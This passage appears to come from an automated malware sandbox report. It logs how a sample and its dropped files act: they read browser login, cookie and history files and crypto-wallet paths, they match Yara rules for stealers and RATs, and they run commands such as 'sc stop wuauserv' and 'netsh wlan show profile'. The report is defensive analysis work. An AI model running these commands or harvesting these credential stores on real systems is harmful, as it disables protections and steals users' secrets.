Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75002\base_library.zip VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Code function: 0_2_00007FF72B8DD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF72B8DD010

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Code function: 0_2_00007FF72B8F5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF72B8F5C00

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Code function: 5_2_0042D076 GetVersionExW,

5_2_0042D076

Source: C:\ProgramData\Microsoft\hacn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Amnesia Stealer

Source: Yara match	File source: 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7556, type: MEMORYSTR

Yara detected DCRat

Source: Yara match

File source: 00000021.00000002.2411600731.000000001358B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Discord Token Stealer

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Yara detected Millenuim RAT

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 12.3.s.exe.6b53711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.ChainComServermonitor.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000003.2086410223.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.2123320987.0000000000C82000.00000002.00000001.01000000.00000027.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2085959626.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\3D Objects\tasklist.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Logs\SettingSync\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 12.3.s.exe.6b53711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.ChainComServermonitor.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\3D Objects\tasklist.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Logs\SettingSync\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: based.exe, 00000008.00000002.2802048410.000001F16D8E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: based.exe, 00000008.00000002.2802048410.000001F16D8E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: based.exe, 00000008.00000002.2802048410.000001F16D8E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295	Jump to behavior
